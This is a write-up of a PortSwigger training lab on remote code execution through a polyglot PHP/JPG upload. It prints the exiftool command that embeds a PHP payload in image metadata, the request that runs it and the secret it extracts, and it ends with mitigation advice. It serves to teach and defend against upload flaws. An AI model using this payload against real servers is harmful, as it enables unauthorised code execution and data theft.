Remote Code Execution via Polyglot Web Shell Upload

Lab Difficulty: Practitioner
Vulnerability Type: File Upload / Remote Code Execution (RCE)
Lab Link: PortSwigger Lab

Summary
This lab demonstrates how file upload validation based on MIME type and image content analysis can be bypassed using a polyglot file. Even when the server verifies that an uploaded file is a valid image,
it may still interpret and execute embedded server-side code if the file has a .php extension. By injecting PHP payloads into image metadata, attackers can achieve remote code execution (RCE).

Objective
Upload a polyglot PHP/JPG web shell that bypasses image content validation, use it to read the contents of /home/carlos/secret,
and submit the secret to complete the lab.

Technical Walkthrough
1. Reconnaissance
Logged in with provided credentials: wiener:peter

Located an avatar upload function in the user profile page

Observed that the server checks uploaded files to ensure they are real images and blocks non-image content

2. Creating a Polyglot Payload
Created a valid image file (input.jpg) and embedded PHP code into its metadata using ExifTool:

exiftool -Comment="<?php echo 'START ' . file_get_contents('/home/carlos/secret') . ' END'; ?>" input.jpg -o polyglot.php
This command inserts the PHP payload into the Comment field of the JPEG file and saves it with a .php extension

3. Uploading the Polyglot
Uploaded polyglot.php as the avatar
  
Server accepted the upload, since the image content was valid despite the .php extension

4. Executing the Payload
Located the uploaded file's access URL in Burp HTTP history:

GET /files/avatars/polyglot.php
Sent this request via Burp Repeater

Located the PHP output inside the binary image response using "START" and "END" markers:

START 2B2tlPyJQfJDynyKME5D02Cw0ouydMpZ END
Result
Successfully extracted Carlos’s secret from the response and submitted it to solve the lab.

Mitigation
To prevent this vulnerability in production environments:

Disallow execution of files in upload directories by configuring the web server (e.g., with .htaccess or server settings)

Validate content and file type using server-side MIME detection, and never trust the file extension alone

Strip all metadata from uploaded files to remove any embedded scripts or payloads

Rename uploaded files and store them in directories outside the web root when execution is not required
